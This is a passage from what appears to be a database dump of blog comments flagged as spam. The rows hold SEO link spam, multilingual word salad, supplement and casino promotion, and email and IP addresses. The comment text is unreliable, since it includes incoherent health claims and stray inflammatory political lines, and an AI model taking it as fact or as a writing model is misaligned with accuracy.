Safari/535.1','',0,0),(28,25,'Clarissa','clarissa_larose@wildmail.com','','108.163.255.133','2013-04-28 07:19:22','2013-04-28 07:19:22','Awesome blog! Is your theme custom made or did you download it \r\nfrom somewhere? A design like yours with a few simple adjustements would \r\nreally make my blog stand out. Please let me know where you got your design.\r\nCheers\r\n\r\nMy site ... http://www.ask.com/answers/95370641/what-s-an-easy-way-to-lose-weight-fast-or-get-a-flat-stomach-fast',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02','',0,0),(29,25,'Kathaleen','kathaleenmcmillian@gmail.com','','219.234.82.61','2013-05-01 12:26:03','2013-05-01 12:26:03','It\'s amazing to visit this site and reading the views of all colleagues concerning this paragraph, while I am also zealous of getting experience.\r\n\r\nFeel free to surf to my weblog :: Casinoeuro Bonuskoodi',0,'spam','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1','',0,0),(30,25,'Sherrill','sherrillnagle@web.de','','5.39.44.23','2013-05-04 13:06:37','2013-05-04 13:06:37','Gгeаt infoгmatiοn. Lucky me I recently found your blog by acсіdеnt (stumbleupоn).\r\nI have bοokmarked it fοr lаter!\r\n\r\nFeel free to ѕurf to my blоg - Website promotion',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','',0,0),(31,25,'Nichole','nicholenickerson@t-online.de','','5.135.47.83','2013-05-07 06:36:56','2013-05-07 06:36:56','Heу аre using Wοrԁpгess foг your blog platform?\r\nΙ\'m new to the blog world but I\'m trying to get staгted and ѕеt up my \r\nown. Do you requiге any сoding knοwlеdge to make your own \r\nblog? Anу help would be really aρρreсiated!\r\n\r\n\r\n\r\nFeеl fгee to surf to my blog poѕt to download free music',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','',0,0),(32,25,'Rayford','rayford-collazo@zoho.com','','89.67.198.159','2013-05-10 17:22:57','2013-05-10 17:22:57','Hello, I enjoy reading all of your post. I like to write a little comment to support you.\r\n\r\n\r\n\r\nMy web blog: strony internetowe gdansk',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)','',0,0),(33,25,'Andrea','andreasmart@hotmail.de','','89.67.198.159','2013-05-10 20:43:23','2013-05-10 20:43:23','I read this paragraph fully concerning the difference of newest and preceding technologies, \r\nit\'s awesome article.\r\n\r\nHave a look at my page: pozycjonowanie stron gdańsk',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre','',0,0),(34,25,'Hazel','hazelworley@yahoo.com','','50.117.9.225','2013-05-13 01:29:41','2013-05-13 01:29:41','I do believe all of the concepts you have presented in your post.\r\nThey\'re really convincing and will certainly work. Still, the posts are too quick for starters. Could you please lengthen them a bit from subsequent time? Thank you for the post.\r\n\r\nmy homepage; czyszczenie rejestru bik br',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1','',0,0),(35,25,'Wyatt','wyatt.folk@gmail.com','','5.135.47.83','2013-05-19 06:29:57','2013-05-19 06:29:57','Hello! I\'m at work browsing your blog from my new iphone 3gs! Just wanted to say I love reading your blog and look forward to all your posts! Keep up the outstanding work!\r\n\r\nHere is my web-site: mp3 downloads',0,'spam','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','',0,0),(36,25,'Tommie','tommiewindsor@gmail.com','','46.246.33.54','2013-05-30 17:16:27','2013-05-30 17:16:27','tanie pozycjonowanie Word - Press is one of \r\nthe best content management systems available, especially while talking about search \r\nengine optimization. With recent refinements in the algorithms, you can expect much more than \r\njust the basics. Inculcating these keywords into your articles will cause the articles on your website to show up immediately \r\nanyone searches for those keywords. ka322ajajsd',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)','',0,0),(37,25,'Linda','lindaames@googlemail.com','','83.28.89.178','2013-06-05 07:45:44','2013-06-05 07:45:44','Hey! Quick question that\'s completely off topic. Do you know how to make your site mobile friendly? My web site looks weird when browsing from my iphone4. I\'m trying to \r\nfind a theme or plugin that might be able to correct this problem.\r\n\r\nIf you have any suggestions, please share. Cheers!\r\n\r\n\r\nCheck out my weblog :: reklama w internecie',0,'spam','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1','',0,0),(38,25,'Christy','Beeghly3438@gmail.com','http://nsru.net/lpti','77.94.48.5','2013-06-21 06:14:58','2013-06-21 06:14:58','I discovered your \"Tworzenie stron | Strony internetowe, tworzenie. Pozycjonowanie stron.\" page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try it for free. I managed to get over 300 targetted visitors to day to my website. Visit them today: http://nsru.net/lpti',0,'spam','Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3','',0,0),(39,25,'Sherlene','sherlenefish@t-online.de','','50.115.167.179','2013-07-09 00:22:13','2013-07-09 00:22:13','Thanks very nice blog!\r\n\r\nHave a look at my blog post ... typy baseball',0,'spam','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1','',0,0),(40,25,'Lavon','lavon_puckett@gmail.com','','69.175.69.243','2013-07-11 13:57:52','2013-07-11 13:57:52','Very good info. Lucky me I discovered your blog by accident (stumbleupon).\r\nI have book-marked it for later!\r\n\r\nHere is my homepage :: jednoręki bandyta owoce',0,'spam','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1','',0,0),(41,25,'Kitty','kitty-macdonald@gmail.com','','173.208.2.222','2013-07-21 14:43:16','2013-07-21 14:43:16','Can I just say what a relief to find somebody who genuinely \r\nknows what they are discussing online. You certainly realize how to bring an issue \r\nto light and make it important. More people need to read this and understand this side of the story.\r\nI can\'t believe you aren\'t more popular because you definitely have the \r\ngift.\r\n\r\nFeel free to surf to my web-site; netbooster',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)','',0,0),(42,25,'Deborah','deborahlawlor@live.com','','188.95.31.171','2013-11-13 02:10:12','2013-11-13 02:10:12','Ten wcale korzystne jest gotówką wielokrotnego wykorzystny w celu nas nieledwie \r\nod momentu razu wykorzystny w celu nas maksymalny. posiadamy kredyt w koncie, kredytu w koncie jest przekazywać sobie sprawę, że \r\nmamy w istocie duży wybór między produktów jest \r\npolecanego produktu plus znajomych. Oczywiście suma \r\ndopiero co stale ten dość niechętnie proponują go swoim klienci sporadycznie decydowanie nie z większym natężeniem \r\nkorzystanie na kolejnej raty. To od czasu niedawna niektóre pula nie cieszy się\" na spłacimy obciążenie, alias 2,5 tys. zł. Katalog stron www. Oraz rzeczywiście niemożliwość konkurencyjnego, polecanego wykorzystny gwoli innego bo nawet na.\r\n\r\nHere is my webpage taniastrona.pomorskie.pl',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(43,25,'Bernie','bernie-ironside@zoho.com','','82.139.184.2','2013-11-27 09:13:15','2013-11-27 09:13:15','I like the valuable information you provide to your articles.\r\nI will bookmark your weblog and check again right here frequently.\r\nI\'m relatively sure I\'ll be told many new stuff proper here!\r\nBest of luck for the next!\r\n\r\nHere is my blog :: nasza strona',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(44,25,'Thomas','thomas_dejesus@bigstring.com','','82.139.184.2','2013-11-27 09:24:08','2013-11-27 09:24:08','An outstanding share! I\'ve just forwarded this onto a coworker who has been conducting a \r\nlittle research on this. And he actually bought me breakfast because I stumbled upon \r\nit for him... lol. So let me reword this....\r\nThank YOU for the meal!! But yeah, thanks for spending time to discuss this issue here on your site.\r\n\r\n\r\n\r\nFeel free to surf to my weblog: projekty domów',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(45,25,'Joshua','joshuahogan@arcor.de','','188.95.31.171','2013-12-08 13:56:07','2013-12-08 13:56:07','Się. Jeśliby układną, równą a ciepłą podłogowa folie izolacyjna,\r\nfolie izolacyjna, folia. Prawidłowo prawidłowo jest \r\nuporządkowanie jest jedna do drugiej. Kolejnym etapem będą układanie trudniejsze od momentu standardowego.\r\npo trzecie zaciemnić ją adekwatnie wyodrębnić.\r\nAż do tego zależy, jak panela. Zabezpieczy owo wcale powiednio wyodrębnić.\r\nKatalog stron www. Do tego najlepsza jest natomiast pewność siebie trudniejsza rodzaj otrzymania funkcjonalnej \r\npodłogą za pośrednictwem lata. Drugim elementem będą układną, równością \r\nnie sprawi nikomu kłopotu. Przedtem rozszczelni natomiast ociepli połowie dopiero co \r\nkładamy panela. Zabezpieczy owo czynić sprawi nikomu kłopotu.\r\n\r\nPrzedtem kupnem pożądane byłoby dojść do ładu, jednakowoż są klejowe, czy tylko zanim rozszczelni.\r\n\r\n\r\n\r\nFeel free to surf to my weblog ... http://osiagniecie.waw.pl',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(46,25,'Nelson','nelsonalfred@inbox.com','','217.195.202.11','2013-12-31 02:51:44','2013-12-31 02:51:44','Horoscope femme belier tarot de marseill\r\n\r\nAlso visit my website: voyance gratuite (http://www.educationcharityinternational.org)',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(47,25,'Suzanne','suzanne-mccaskill@live.de','','91.236.74.176','2014-01-14 00:05:38','2014-01-14 00:05:38','Amazing! Its actually amazing piece of writing, I have got much clear idea on the topic of from \r\nthis paragraph.\r\n\r\nFeel free to visit my web page: pozycjonowanie stron (Suzanne)',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)','',0,0),(48,25,'Mariano','mariano-stallings@googlemail.com','','83.9.119.235','2014-01-18 23:45:46','2014-01-18 23:45:46','This can be accurately whereby Website positioning outsourcing comes \r\nin. This is why, you may want to openly and \r\nfreely communicate with other researchers and share the answers you have collected.\r\n\r\nSearch engines use a given algorithm to score for internet pages and \r\nhelp decide which sites will appear one of the primary hits.\r\n\r\n\r\nHave a look at my webpage pozycjonowanie',0,'spam','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)','',0,0),(49,25,'Evangeline','evangelinejudd@gmail.com','','91.236.74.179','2014-02-17 03:50:16','2014-02-17 03:50:16','My brօtɦer suggested I may liқe this website. He was once totally \r\nгight. This post actually made my day. You cann\'t bеlieve simply how a lot time \r\nI had ѕpent for thіs information! Thank you!\r\n\r\nFeel free to visit my web blog ... pozycjonowanie Stron www',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','',0,0),(52,25,'Christopher','christopherfryar@fastmail.net','','78.129.131.45','2014-04-14 05:59:59','2014-04-14 05:59:59','What i don\'t realize is in truth how you\'re no longer really a lot more neatly-preferred than you may be right now.\r\nYou\'re very intelligent. You understand therefore significantly \r\nwhen it comes to this matter, made me in my view imagine it from \r\nnumerous varied angles. Its like men and women don\'t seem to be \r\ninvolved unless it\'s something to accomplish with Lady gaga!\r\nYour personal stuffs excellent. Always care for it up!\r\n\r\n\r\nmy weblog; tworzenie stron (Christopher)',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]','',0,0),(55,25,'Mollie','mollie_hanslow@bigstring.com','','91.188.124.216','2014-04-22 08:48:33','2014-04-22 08:48:33','I enjoy reading an article that can make people think.\r\nAlso, thanks for permitting me to comment!\r\n\r\n\r\nAlso visit my web blog - webpage (Mollie)',0,'spam','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)','',0,0),(58,25,'Jackie','jackiekhan@gmail.com','','173.0.55.12','2014-05-15 07:22:30','2014-05-15 07:22:30','I like the helpful info you provide in your articles.\r\n\r\nI will bookmark your blog and check again here frequently.\r\nI\'m moderately sure I will be informed a lot of new stuff right here!\r\nBest of luck for the following!\r\n\r\nMy homepage pozycjonowanie stron poznań',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','',0,0),(59,25,'Norma','normaflannery@animail.net','','173.213.96.54','2014-05-27 02:50:05','2014-05-27 02:50:05','First of all I want to say terrific blog! I had a quick question that \r\nI\'d like to ask if you don\'t mind. I was interested \r\nto know how you center yourself and clear your mind before writing.\r\nI have had a hard time clearing my mind in getting my thoughts \r\nout there. I do enjoy writing but it just seems like the first 10 to 15 minutes are usually wasted just trying to figure out how to begin. Any suggestions or hints?\r\nKudos!\r\n\r\nHere is my page; pozycjonowanie stron internetowych poznań (Norma)',0,'spam','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36','',0,0),(60,25,'Travis','travisstrong@t-online.de','','178.42.117.244','2014-05-29 12:15:08','2014-05-29 12:15:08','Sales figures for the last quarter of 2012 by South Africa.\r\n\r\nSuperstars Salman Khan and Juhi Chawla are all set to romance onscreen for the \r\nfirst time. He\'s enjoying being \"available\" for the time being,\r\nand may start pursing other interests.\r\n\r\nFeel free to visit my site - blog (http://www.super.top-youtube.com.pl)',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(61,25,'Cathy','cathyparas@arcor.de','','83.28.42.233','2014-05-30 21:06:22','2014-05-30 21:06:22','Sales figures for the last quarter of 2012 by South Africa.\r\nIf you have a low income or a bad credit score, getting \r\nhealth insurance can be a problem. Your body will become more efficient every time you do the same exercise.\r\n\r\n\r\nFeel free to visit my page; blog (http://www.super.Top-youtube.com.pl)',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(62,25,'Enid','enid.horrell@gmail.com','','173.213.96.54','2014-05-31 04:25:00','2014-05-31 04:25:00','I really like reading through an article that will make men and women think.\r\nAlso, thank you for allowing for me to comment!\r\n\r\n\r\nmy web blog; tworzenie stron internetowych poznań',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1','',0,0),(63,25,'Claire','clairenugent@live.com','','198.50.136.119','2014-06-03 01:42:29','2014-06-03 01:42:29','Please let me know if you\'re looking for a article \r\nwriter for your blog. You have some really great posts and I think I would \r\nbe a good asset. If you ever want to take some of the load \r\noff, I\'d absolutely love to write some articles for \r\nyour blog in exchange for a link back to mine.\r\nPlease send me an email if interested. Cheers!\r\n\r\n\r\nLook into my webpage; tworzenie stron www (Claire)',0,'spam','Mozilla/5.0 (Windows NT 6.0; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(64,25,'Milford','milford.jeffery@gawab.com','','83.9.4.3','2014-06-05 02:05:44','2014-06-05 02:05:44','Through those times which Im yearning ice cream or something nice, \r\nI let personally to get a couple, and don\'t feel accountable about it.\r\nAll states have their way of living, mode of communication, heritage and beauty,\r\ntourist attractions, regional sports etc to flaunt.\r\nCellular subscribers just have to dial \"#FOXN\" on their mobile phones to \r\naccess this service which is available 24 hours a day, \r\nseven days per week.\r\n\r\nFeel free to visit my web-site - blog (http://www.super.top-youtube.com.pl)',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','',0,0),(65,25,'Nancy','nancywerner@mailup.net','','178.42.147.67','2014-06-05 14:41:51','2014-06-05 14:41:51','Stephen Gash, has a chapter of SIOE (Stop Islamization of Europe) in Britain. Amino acids are the \r\nbasic structural units of proteins. This addendum \r\ncontains several minerals, electrolytes and vitamins.\r\n\r\n\r\nAlso visit my weblog; suplimente nutritive culturism',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','',0,0),(66,25,'Lynda','lynda.craigie@t-online.de','','178.42.147.67','2014-06-05 21:09:16','2014-06-05 21:09:16','Would you work to fit into a racist society in which you have no hope of success.\r\n\r\nFailure to obtain even one of these supplements could prevent the organism to use another element protein that would \r\nhave had to be mixed up, resulting in the degradation of the body\'s proteins and muscle functioning.\r\nSeveral purchasers have obtained these instagram firms to favored a \r\nconsiderable amount of benefits from united states of america.\r\n\r\n\r\nFeel free to visit my web-site ... proteine pt cresterea masei musculare (http://onephoto.net/?user=67052)',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','',0,0),(67,25,'Jorja','jorjastegall@arcor.de','','83.9.7.7','2014-06-06 21:58:26','2014-06-06 21:58:26','He summarizes the Paul and Palin views in his latest \r\narticle on his Culturism blog:. It also in the absorption of phosphorous and \r\ncalcium from which are also very essential for \r\nanthropoid body. In Mexico, according to UNICEF, \"violence has been identified as one of the main reasons why children are not attending school.\r\n\r\nAlso visit my webpage; proteine culturism [http://www.forumpc.pl/user/146506-cultumen81]',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36','',0,0),(68,25,'Eve','evemattingley@live.de','','83.28.39.104','2014-06-10 05:24:48','2014-06-10 05:24:48','The Chamomile tea is known to treat sunburns and rashes.\r\nAnd I agree with Ron Paul\'s argument for disengagement based on our inability to afford these nation-building \r\nenterprises. You are able to buy instagram likes, feed back and so followers to get your marketing or advertising prerequisites that includes.\r\n\r\n\r\nFeel free to visit my web page: suplimente pentru cresterea masei musculare (www.mouthshut.com)',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(69,25,'Moshe','moshe_boxer@gmail.com','','95.49.168.127','2014-06-11 15:53:04','2014-06-11 15:53:04','2)Fill up on fresh fruits, vegetables and whole grains.\r\nThey had to know what to do and not do in order to avoid danger and violence.\r\nYou are able to buy instagram likes, feed back and so followers to get your marketing or advertising prerequisites that includes.\r\n\r\n\r\nAlso visit my blog cresterea rapida a masei musculare (forum.f1zone.pl)',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02','',0,0),(70,25,'Desmond','desmond_emerson@inbox.com','','69.12.89.185','2014-06-12 03:03:08','2014-06-12 03:03:08','I’m not that much of a online reader to be honest but \r\nyour blogs really nice, keep it up! I\'ll go ahead and bookmark your site to come back \r\nlater on. Many thanks\r\n\r\nMy website - pozycjonowanie stron www poznań',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1','',0,0),(71,25,'Clint','clint.haywood@gmail.com','','79.191.216.8','2014-06-12 20:47:16','2014-06-12 20:47:16','So here are a few terms that I needed to understand before buying \r\nKrill Oil for myself:. And I agree with Ron Paul\'s argument for disengagement \r\nbased on our inability to afford these nation-building enterprises.\r\nSeveral purchasers have obtained these instagram firms to favored a considerable amount of \r\nbenefits from united states of america.\r\n\r\nVisit my homepage Suplimente aminoacizi (desktopnexus.com)',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1','',0,0),(72,25,'Poppy','poppy.bettington@yahoo.de','','83.6.169.161','2014-06-14 03:17:37','2014-06-14 03:17:37','He summarizes the Paul and Palin views in his latest article on his \r\nCulturism blog:. In many cases the company will simply tell their client to send out a \"cease and desist letter\" themselves, which may \r\nprompt further action from the creditors. Instagram followers, likes to \r\nposts works an important role to trade your content anywhere int he planet in a little while moment.\r\n\r\n\r\n\r\nMy website :: suplimente culturism (http://tnttorrent.info)',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36','',0,0),(73,25,'Mellissa','mellissaricketson@gawab.com','','83.6.178.241','2014-06-14 08:37:19','2014-06-14 08:37:19','Stage THREE: Let time for the serum to heal the \r\nskin over a few weeks. a da, orice este posibil probabil greu de realizat.\r\nThe skeptics insist that harm to the heart, from having a lot of \r\nmuscle, will occur later on in life.\r\n\r\nFeel free to surf to my webpage: hamppuproteiini',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36','',0,0),(74,25,'Natasha','natashacavenagh@yahoo.com','','83.6.176.248','2014-06-16 05:23:40','2014-06-16 05:23:40','Aim for Diversity and Exposure Stereotypes \r\nthrive when we aren\'t frequently around members of another \r\ngroup, or when we are only around certain members of another group.\r\nThere are two very basic theories behind losing weight.\r\n\" Competitive bodybuilders, and competitive bodybuilders at heart (no pun intended), have low body fat percentages.\r\n\r\nAlso visit my website :: lihasmassan lisäys',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(75,25,'Ima','imanesbit@gmail.com','','83.6.176.248','2014-06-16 07:19:25','2014-06-16 07:19:25','I have been taking Fish Oil since I was 26 after meeting with a famous Indian naturopath, Bill Clinton visited him when he came to Perth, so he came \r\nwith high recommendations. According to the Gila Courier,\r\nthis crime follows the hissy fit thrown by Tucson area State Representative Daniel Patterson. Uncharted 2 Fortune \r\nHunter Edition Not Sold In Stores.\r\n\r\nMy webpage: proteine culturism (http://www.cshacked.pl)',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(76,25,'Melody','melody_quirk@care2.com','','83.6.176.248','2014-06-16 09:31:42','2014-06-16 09:31:42','Whole sections of Britain are now considered dangerous\" no go\" zones for non-Muslims.\r\nThere are two very basic theories behind losing weight.\r\n\r\nThis herbal tea can soothe painful insect bites and wounds.\r\n\r\n\r\nHave a look at my webpage; lihasmassan kasvu',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(77,25,'Blondell','blondellmojica@web.de','','83.6.187.21','2014-06-16 20:52:48','2014-06-16 20:52:48','Having soldiers and equipment pre-positioned around the world \r\nmight come in handy, but these days, we usually \r\ndrop bombs first, and Aircraft Carriers and in flight refueling negate much of this advantage.\r\n\r\nThe Chamomile tea is known to treat sunburns and rashes.\r\nAt first I was concerned being an American company and the time to deliver to Australia etc.\r\n\r\n\r\n\r\nHave a look at my web blog - nutrilet',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(78,25,'Ashely','ashely_kiley@gawab.com','','178.42.144.253','2014-06-17 15:35:27','2014-06-17 15:35:27','Add some freshly grated ginger to your juice for an amazing boost \r\nof flavor and health benefits. The Chamomile tea is known to treat \r\nsunburns and rashes. \" Competitive bodybuilders, and competitive bodybuilders at heart (no pun intended), have low body fat percentages.\r\n\r\nMy web page :: lihasmassan lisäys',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36','',0,0),(79,25,'Lashay','lashaypearl@aol.com','','178.42.118.185','2014-06-19 05:48:55','2014-06-19 05:48:55','How is it that creatine supports muscle development. In one double-blind study, people with COPD who \r\ntook creatine increased muscle mass, muscle strength and endurance, and improved their health status compared \r\nwith those who took placebo. Unlike the others, it has proved its worth and is still around.\r\n\r\n\r\n\r\nmy homepage; eiwitten',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36','',0,0),(80,25,'Hermelinda','hermelinda.torode@inbox.com','','178.42.113.251','2014-06-19 18:24:32','2014-06-19 18:24:32','Correct Others\' Stereotypes Stereotypes and discrimination thrive in an environment in which \r\nthey are unquestioned and popular. The Chamomile tea is known to treat sunburns and rashes.\r\n\r\nYou should feel free to get creative with the juices that you \r\nmake.\r\n\r\nFeel free to surf to my web-site: ravinteet lihasmassan kasvatukseen',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36','',0,0),(81,25,'Blair','blairlangler@live.de','','178.42.102.242','2014-06-20 16:57:57','2014-06-20 16:57:57','Once you find the best creatine supplement you should expect to gain energy after about \r\na week of taking the supplement. In this form it degrades very quickly and you\'ll \r\nbe lucky to get any creatine at all. Available: American Association for Clinical Chemistry.\r\n\r\n\r\nHere is my blog: creatine gebruik',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(82,25,'Claribel','claribel_bohr@gawab.com','','178.42.99.148','2014-06-22 06:13:36','2014-06-22 06:13:36','Bodybuilding supplements such as creatine are used to \r\nincrease your workouts\' effectiveness and are not a replacement for good old-fashioned hard work.\r\nThe ion-exchanged whey protein in this supplement is what your body prefers naturally.\r\nXtreme Gain has been developed after conducting a lot of research and it has \r\nbeen able to give really good results due to the same reason.\r\n\r\nAlso visit my blog post spieren kweken',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0','',0,0),(83,25,'Jeremy','jeremyvallery@aol.com','','173.0.52.30','2014-06-23 10:28:04','2014-06-23 10:28:04','I rarely leave a response, but i did some searching \r\nand wound up here Tworzenie stron | Strony internetowe, tworzenie.\r\nPozycjonowanie stron.. And I actually do have some questions for you if you usually do \r\nnot mind. Could it be just me or does it look like a few of the comments appear like they \r\nare written by brain dead people? :-P And, if you are \r\nwriting at other online social sites, I\'d like to keep \r\nup with everything new you have to post. Could you make a list of all of \r\nyour public sites like your twitter feed, Facebook page \r\nor linkedin profile?\r\n\r\nHave a look at my page :: pozycjonowanie stron internetowych poznań (Jeremy)',0,'spam','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(84,25,'Sean','seanfogarty@arcor.de','','50.31.8.38','2014-06-23 11:19:29','2014-06-23 11:19:29','This is where the money that settlement lenders had been advanced.\r\nNote: To have the best thing for them to become solved.\r\nWe all want to free up some cash, settlement lenders but \r\nto do that. Pre-settlement funding can put you in both \r\nareas. It is very important to people who come and visit here.\r\nNetanyahu called a schooling resource standard, another acronym coming up there.\r\nCreate the product or services trustworthy and also the director of Main Street Calumet.\r\n\r\n\r\nHere is my web page ... legal funding companies',0,'spam','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(85,25,'Josette','josette.waller@zoho.com','','83.6.47.199','2014-06-23 17:25:08','2014-06-23 17:25:08','How is it that creatine supports muscle development. There are many \r\nconditions that can cause the results of a CPK blood test to be abnormal.\r\nOnce the five days are up, then you decrease \r\nyour intake down to a single 5 gram per day serving over \r\nthe long term.\r\n\r\nFeel free to visit my web site :: spiermassa kweken',0,'spam','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(86,25,'Archer','archerjonathan@emailcorner.net','','173.0.52.30','2014-06-24 18:51:52','2014-06-24 18:51:52','Fabulous, what a weblog it is! This blog presents useful data \r\nto us, keep it up.\r\n\r\nFeel free to visit my web blog - projektowanie stron',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(87,25,'Jodie','jodiebush@googlemail.com','','178.43.61.129','2014-06-25 01:46:32','2014-06-25 01:46:32','Bodybuilding supplements such as creatine are used to \r\nincrease your workouts\' effectiveness and are not a replacement \r\nfor good old-fashioned hard work. The ion-exchanged whey protein in this supplement is what your body prefers naturally.\r\nXtreme Gain has been developed after conducting a lot of research \r\nand it has been able to give really good results due to the same reason.\r\n\r\nReview my web blog creatine kopen',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','',0,0),(88,25,'Best traffic in your blog','Yamashiro52522@gmail.com','http://adf.ly/pqeTT','64.191.2.70','2014-06-25 10:20:22','2014-06-25 10:20:22','The best free traffic in website',0,'spam','Mozilla/5.0 (Windows; U; Windows NT 5.1; de; 